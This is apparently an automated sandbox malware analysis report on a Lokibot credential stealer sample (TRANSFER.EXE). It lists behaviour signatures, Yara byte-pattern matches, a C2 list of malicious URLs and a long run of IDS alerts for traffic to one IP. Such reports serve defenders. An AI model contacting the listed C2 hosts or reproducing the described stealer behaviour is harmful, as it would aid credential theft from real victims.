Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TRANSFER.EXE

Overview

General Information

Sample Name:TRANSFER.EXE
Analysis ID:679099
MD5:6153ed96a83ceea98dbae09e7b77fcf6
SHA1:7f9a6ce71969ef0eb7deeafed635a127f23e37a8
SHA256:08b3772f35997a0eb0894e7e58b4a324324de6121f557976909bdaa31a2c883e
Tags:exeLoki
Infos:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected UAC Bypass using CMSTP
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Yara detected Lokibot
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Yara detected aPLib compressed binary
Tries to harvest and steal ftp login credentials
Contains functionality to hide user accounts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to steal Mail credentials (via file registry)
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • TRANSFER.EXE (PID: 5732 cmdline: "C:\Users\user\Desktop\TRANSFER.EXE" MD5: 6153ED96A83CEEA98DBAE09E7B77FCF6)
    • cmdkey.exe (PID: 5816 cmdline: C:\Windows\SysWOW64\cmdkey.exe MD5: 621B275C5DDBF13327E6A94222EDD433)
  • cleanup
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://sempersim.su/gi4/fre.php"]}
SourceRuleDescriptionAuthorStrings
00000000.00000002.409970337.0000000003C25000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
    00000000.00000002.409421719.0000000003B05000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000002.409421719.0000000003B05000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
        00000000.00000002.409421719.0000000003B05000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
          00000000.00000002.409421719.0000000003B05000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Lokibot_1f885282unknownunknown
          • 0x17940:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
          Click to see the 78 entries
          SourceRuleDescriptionAuthorStrings
          1.0.cmdkey.exe.400000.1.raw.unpackWindows_Trojan_Lokibot_0f421617unknownunknown
          • 0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
          0.2.TRANSFER.EXE.3b05550.1.raw.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
          • 0x13e78:$s1: http://
          • 0x17633:$s1: http://
          • 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
          • 0x13e80:$s2: https://
          • 0x13e78:$f1: http://
          • 0x17633:$f1: http://
          • 0x13e80:$f2: https://
          0.2.TRANSFER.EXE.3b05550.1.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0.2.TRANSFER.EXE.3b05550.1.raw.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
              0.2.TRANSFER.EXE.3b05550.1.raw.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
                Click to see the 148 entries
                No Sigma rule has matched
                Timestamp:192.168.2.68.8.8.850958532014169 08/05/22-09:10:51.380843
                SID:2014169
                Source Port:50958
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:192.168.2.645.11.26.14449787802825766 08/05/22-09:10:58.658888
                SID:2825766
                Source Port:49787
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449860802025381 08/05/22-09:12:05.554361
                SID:2025381
                Source Port:49860
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449773802021641 08/05/22-09:10:51.481984
                SID:2021641
                Source Port:49773
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449788802021641 08/05/22-09:11:01.711456
                SID:2021641
                Source Port:49788
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449813802024313 08/05/22-09:11:38.357337
                SID:2024313
                Source Port:49813
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449806802825766 08/05/22-09:11:25.288207
                SID:2825766
                Source Port:49806
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449769802825766 08/05/22-09:10:41.114928
                SID:2825766
                Source Port:49769
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449772802825766 08/05/22-09:10:49.248779
                SID:2825766
                Source Port:49772
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:45.11.26.144192.168.2.680498112025483 08/05/22-09:11:34.337182
                SID:2025483
                Source Port:80
                Destination Port:49811
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449791802021641 08/05/22-09:11:04.815056
                SID:2021641
                Source Port:49791
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:45.11.26.144192.168.2.680498132025483 08/05/22-09:11:39.718840
                SID:2025483
                Source Port:80
                Destination Port:49813
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449813802024318 08/05/22-09:11:38.357337
                SID:2024318
                Source Port:49813
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:45.11.26.144192.168.2.680498082025483 08/05/22-09:11:31.149561
                SID:2025483
                Source Port:80
                Destination Port:49808
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.68.8.8.851971532014169 08/05/22-09:10:38.737056
                SID:2014169
                Source Port:51971
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:192.168.2.645.11.26.14449823802024318 08/05/22-09:11:58.081188
                SID:2024318
                Source Port:49823
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449860802825766 08/05/22-09:12:05.554361
                SID:2825766
                Source Port:49860
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449846802024318 08/05/22-09:12:03.190477
                SID:2024318
                Source Port:49846
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449772802025381 08/05/22-09:10:49.248779
                SID:2025381
                Source Port:49772
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449832802025381 08/05/22-09:12:00.816507
                SID:2025381
                Source Port:49832
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449876802021641 08/05/22-09:12:15.818317
                SID:2021641
                Source Port:49876
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449881802021641 08/05/22-09:12:22.599825
                SID:2021641
                Source Port:49881
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.68.8.8.849695532014169 08/05/22-09:10:53.761004
                SID:2014169
                Source Port:49695
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:192.168.2.645.11.26.14449814802025381 08/05/22-09:11:41.090702
                SID:2025381
                Source Port:49814
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449795802025381 08/05/22-09:11:09.138567
                SID:2025381
                Source Port:49795
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449823802024313 08/05/22-09:11:58.081188
                SID:2024313
                Source Port:49823
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449846802024313 08/05/22-09:12:03.190477
                SID:2024313
                Source Port:49846
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449797802025381 08/05/22-09:11:13.734140
                SID:2025381
                Source Port:49797
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449883802025381 08/05/22-09:12:25.116712
                SID:2025381
                Source Port:49883
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449768802021641 08/05/22-09:10:38.844396
                SID:2021641
                Source Port:49768
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.68.8.8.857037532014169 08/05/22-09:11:01.609616
                SID:2014169
                Source Port:57037
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:192.168.2.645.11.26.14449770802025381 08/05/22-09:10:43.512599
                SID:2025381
                Source Port:49770
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449771802024313 08/05/22-09:10:46.236811
                SID:2024313
                Source Port:49771
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449818802024318 08/05/22-09:11:53.331696
                SID:2024318
                Source Port:49818
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449806802025381 08/05/22-09:11:25.288207
                SID:2025381
                Source Port:49806
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449767802025381 08/05/22-09:10:33.531418
                SID:2025381
                Source Port:49767
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449771802024318 08/05/22-09:10:46.236811
                SID:2024318
                Source Port:49771
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449818802024313 08/05/22-09:11:53.331696
                SID:2024313
                Source Port:49818
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:45.11.26.144192.168.2.680498062025483 08/05/22-09:11:26.638697
                SID:2025483
                Source Port:80
                Destination Port:49806
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449814802825766 08/05/22-09:11:41.090702
                SID:2825766
                Source Port:49814
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449808802825766 08/05/22-09:11:29.964196
                SID:2825766
                Source Port:49808
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449812802025381 08/05/22-09:11:35.695582
                SID:2025381
                Source Port:49812
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449820802021641 08/05/22-09:11:55.767753
                SID:2021641
                Source Port:49820
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449811802825766 08/05/22-09:11:33.059063
                SID:2825766
                Source Port:49811
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:45.11.26.144192.168.2.680498202025483 08/05/22-09:11:56.944314
                SID:2025483
                Source Port:80
                Destination Port:49820
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.68.8.8.852328532014169 08/05/22-09:12:11.720590
                SID:2014169
                Source Port:52328
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:192.168.2.645.11.26.14449769802025381 08/05/22-09:10:41.114928
                SID:2025381
                Source Port:49769
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449775802025381 08/05/22-09:10:56.189285
                SID:2025381
                Source Port:49775
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449774802825766 08/05/22-09:10:53.861086
                SID:2825766
                Source Port:49774
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449804802025381 08/05/22-09:11:20.056413
                SID:2025381
                Source Port:49804
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449816802825766 08/05/22-09:11:45.230367
                SID:2825766
                Source Port:49816
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449880802825766 08/05/22-09:12:19.118779
                SID:2825766
                Source Port:49880
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449869802025381 08/05/22-09:12:11.819483
                SID:2025381
                Source Port:49869
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:45.11.26.144192.168.2.680497702025483 08/05/22-09:10:44.657387
                SID:2025483
                Source Port:80
                Destination Port:49770
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:45.11.26.144192.168.2.680497722025483 08/05/22-09:10:50.403894
                SID:2025483
                Source Port:80
                Destination Port:49772
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449788802024313 08/05/22-09:11:01.711456
                SID:2024313
                Source Port:49788
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449880802024313 08/05/22-09:12:19.118779
                SID:2024313
                Source Port:49880
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449774802025381 08/05/22-09:10:53.861086
                SID:2025381
                Source Port:49774
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449799802825766 08/05/22-09:11:17.792361
                SID:2825766
                Source Port:49799
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.68.8.8.852125532014169 08/05/22-09:11:32.959912
                SID:2014169
                Source Port:52125
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:192.168.2.645.11.26.14449880802024318 08/05/22-09:12:19.118779
                SID:2024318
                Source Port:49880
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449770802021641 08/05/22-09:10:43.512599
                SID:2021641
                Source Port:49770
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449812802825766 08/05/22-09:11:35.695582
                SID:2825766
                Source Port:49812
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.68.8.8.864579532014169 08/05/22-09:12:00.716740
                SID:2014169
                Source Port:64579
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:192.168.2.645.11.26.14449797802024318 08/05/22-09:11:13.734140
                SID:2024318
                Source Port:49797
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449791802024318 08/05/22-09:11:04.815056
                SID:2024318
                Source Port:49791
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449797802024313 08/05/22-09:11:13.734140
                SID:2024313
                Source Port:49797
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449767802021641 08/05/22-09:10:33.531418
                SID:2021641
                Source Port:49767
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449788802024318 08/05/22-09:11:01.711456
                SID:2024318
                Source Port:49788
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449846802825766 08/05/22-09:12:03.190477
                SID:2825766
                Source Port:49846
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:45.11.26.144192.168.2.680497752025483 08/05/22-09:10:57.419937
                SID:2025483
                Source Port:80
                Destination Port:49775
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449791802024313 08/05/22-09:11:04.815056
                SID:2024313
                Source Port:49791
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449799802025381 08/05/22-09:11:17.792361
                SID:2025381
                Source Port:49799
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:45.11.26.144192.168.2.680498322025483 08/05/22-09:12:02.125452
                SID:2025483
                Source Port:80
                Destination Port:49832
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449769802024313 08/05/22-09:10:41.114928
                SID:2024313
                Source Port:49769
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.68.8.8.864150532014169 08/05/22-09:12:05.451836
                SID:2014169
                Source Port:64150
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:45.11.26.144192.168.2.680498232025483 08/05/22-09:11:59.337044
                SID:2025483
                Source Port:80
                Destination Port:49823
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.68.8.8.861901532014169 08/05/22-09:11:17.691645
                SID:2014169
                Source Port:61901
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:192.168.2.68.8.8.859724532014169 08/05/22-09:11:45.132770
                SID:2014169
                Source Port:59724
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:192.168.2.68.8.8.851645532014169 08/05/22-09:12:25.018082
                SID:2014169
                Source Port:51645
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:192.168.2.645.11.26.14449811802024318 08/05/22-09:11:33.059063
                SID:2024318
                Source Port:49811
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449812802021641 08/05/22-09:11:35.695582
                SID:2021641
                Source Port:49812
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449811802024313 08/05/22-09:11:33.059063
                SID:2024313
                Source Port:49811
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.68.8.8.865367532014169 08/05/22-09:11:57.984866
                SID:2014169
                Source Port:65367
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:192.168.2.645.11.26.14449846802021641 08/05/22-09:12:03.190477
                SID:2021641
                Source Port:49846
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449769802024318 08/05/22-09:10:41.114928
                SID:2024318
                Source Port:49769
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:45.11.26.144192.168.2.680498762025483 08/05/22-09:12:16.875250
                SID:2025483
                Source Port:80
                Destination Port:49876
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449818802825766 08/05/22-09:11:53.331696
                SID:2825766
                Source Port:49818
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.68.8.8.860658532014169 08/05/22-09:11:55.669298
                SID:2014169
                Source Port:60658
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:192.168.2.645.11.26.14449813802025381 08/05/22-09:11:38.357337
                SID:2025381
                Source Port:49813
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449770802825766 08/05/22-09:10:43.512599
                SID:2825766
                Source Port:49770
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449795802825766 08/05/22-09:11:09.138567
                SID:2825766
                Source Port:49795
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:45.11.26.144192.168.2.680497692025483 08/05/22-09:10:42.315303
                SID:2025483
                Source Port:80
                Destination Port:49769
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:45.11.26.144192.168.2.680498182025483 08/05/22-09:11:54.547531
                SID:2025483
                Source Port:80
                Destination Port:49818
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.68.8.8.858723532014169 08/05/22-09:10:33.085999
                SID:2014169
                Source Port:58723
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:192.168.2.645.11.26.14449818802021641 08/05/22-09:11:53.331696
                SID:2021641
                Source Port:49818
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:45.11.26.144192.168.2.680498042025483 08/05/22-09:11:21.507119
                SID:2025483
                Source Port:80
                Destination Port:49804
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449820802024318 08/05/22-09:11:55.767753
                SID:2024318
                Source Port:49820
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449869802825766 08/05/22-09:12:11.819483
                SID:2825766
                Source Port:49869
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449876802025381 08/05/22-09:12:15.818317
                SID:2025381
                Source Port:49876
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449795802021641 08/05/22-09:11:09.138567
                SID:2021641
                Source Port:49795
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449787802025381 08/05/22-09:10:58.658888
                SID:2025381
                Source Port:49787
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449881802825766 08/05/22-09:12:22.599825
                SID:2825766
                Source Port:49881
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.68.8.8.863844532014169 08/05/22-09:12:19.016791
                SID:2014169
                Source Port:63844
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:192.168.2.68.8.8.858360532014169 08/05/22-09:11:40.989769
                SID:2014169
                Source Port:58360
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:192.168.2.645.11.26.14449808802024313 08/05/22-09:11:29.964196
                SID:2024313
                Source Port:49808
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.68.8.8.863104532014169 08/05/22-09:11:35.598325
                SID:2014169
                Source Port:63104
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:192.168.2.645.11.26.14449772802024318 08/05/22-09:10:49.248779
                SID:2024318
                Source Port:49772
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449773802825766 08/05/22-09:10:51.481984
                SID:2825766
                Source Port:49773
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449816802025381 08/05/22-09:11:45.230367
                SID:2025381
                Source Port:49816
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449767802825766 08/05/22-09:10:33.531418
                SID:2825766
                Source Port:49767
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449814802024318 08/05/22-09:11:41.090702
                SID:2024318
                Source Port:49814
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449820802024313 08/05/22-09:11:55.767753
                SID:2024313
                Source Port:49820
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449808802024318 08/05/22-09:11:29.964196
                SID:2024318
                Source Port:49808
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449772802024313 08/05/22-09:10:49.248779
                SID:2024313
                Source Port:49772
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449814802024313 08/05/22-09:11:41.090702
                SID:2024313
                Source Port:49814
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449770802024318 08/05/22-09:10:43.512599
                SID:2024318
                Source Port:49770
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449768802025381 08/05/22-09:10:38.844396
                SID:2025381
                Source Port:49768
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449767802024317 08/05/22-09:10:33.531418
                SID:2024317
                Source Port:49767
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.68.8.8.860350532014169 08/05/22-09:10:43.391431
                SID:2014169
                Source Port:60350
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:192.168.2.645.11.26.14449876802825766 08/05/22-09:12:15.818317
                SID:2825766
                Source Port:49876
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449771802025381 08/05/22-09:10:46.236811
                SID:2025381
                Source Port:49771
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449816802021641 08/05/22-09:11:45.230367
                SID:2021641
                Source Port:49816
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449770802024313 08/05/22-09:10:43.512599
                SID:2024313
                Source Port:49770
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:45.11.26.144192.168.2.680497952025483 08/05/22-09:11:10.306523
                SID:2025483
                Source Port:80
                Destination Port:49795
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449767802024312 08/05/22-09:10:33.531418
                SID:2024312
                Source Port:49767
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449797802021641 08/05/22-09:11:13.734140
                SID:2021641
                Source Port:49797
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:45.11.26.144192.168.2.680497972025483 08/05/22-09:11:14.894982
                SID:2025483
                Source Port:80
                Destination Port:49797
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:45.11.26.144192.168.2.680497912025483 08/05/22-09:11:06.091189
                SID:2025483
                Source Port:80
                Destination Port:49791
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449804802024313 08/05/22-09:11:20.056413
                SID:2024313
                Source Port:49804
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449880802021641 08/05/22-09:12:19.118779
                SID:2021641
                Source Port:49880
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449883802024318 08/05/22-09:12:25.116712
                SID:2024318
                Source Port:49883
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:45.11.26.144192.168.2.680498122025483 08/05/22-09:11:36.832118
                SID:2025483
                Source Port:80
                Destination Port:49812
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449804802024318 08/05/22-09:11:20.056413
                SID:2024318
                Source Port:49804
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449883802024313 08/05/22-09:12:25.116712
                SID:2024313
                Source Port:49883
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:45.11.26.144192.168.2.680498142025483 08/05/22-09:11:42.316827
                SID:2025483
                Source Port:80
                Destination Port:49814
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:45.11.26.144192.168.2.680498162025483 08/05/22-09:11:46.446493
                SID:2025483
                Source Port:80
